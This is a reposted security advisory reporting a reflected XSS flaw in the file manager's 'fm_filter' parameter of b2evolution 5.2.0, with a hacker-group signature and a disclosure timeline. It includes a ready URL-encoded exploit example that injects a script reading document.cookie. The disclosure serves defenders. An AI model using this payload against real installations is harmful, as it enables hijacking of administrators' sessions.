facebook facebook twitter rss

Reflecting XSS vulnerability in CMS filemanager of b2evolution v. 5.2.0

Author: Oussama911 , Published: 16-01-2015
Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v.
5.2.0
#Date: 17 January 2015
#Author: Oussama911
#Greetz : Anonymous Algeria Team - Virus28 Team - Dz Mafia Team - Toxic Dz - Russi1703ox - Djamel11154 - all dz coders & hackers
#Visit Us On : www.anonymousalgeria-gov.gq - /!\ © Anonymous Dz Algeria /!\
# Contact : fb.me/Anonymous.goverments - fb.me/teamvirus28
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: http://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: -

==========================
Vulnerability Description:
==========================

The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS attacks.

==================
Technical Details:
==================

By appending aribitrary HTML- and/or JavaScriptcode to the "fm_filter"
parameter of the URL where the filemanager functionality of b2eveolution is
located, an attacker could trick an authenticated administrative user to
execute the code.

Filemanager is located here on a common b2evolution installation:

http://
{TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

Exploit-Example:

http://
{TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

=========
Solution:
=========

Vendor did not respond and submitted no solution.

====================
Disclosure Timeline:
====================

30-Dec-2014 – found the vulnerability
30-Dec-2014 - informed the developers (incl. announcement to release
technical details on 13th Jan 2015 if there is no response)
30-Dec-2014 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor did not respond
13-Jan-2015 - release date of this security advisory
13-Jan-2015 - send to lists
..............

Like us on Facebook :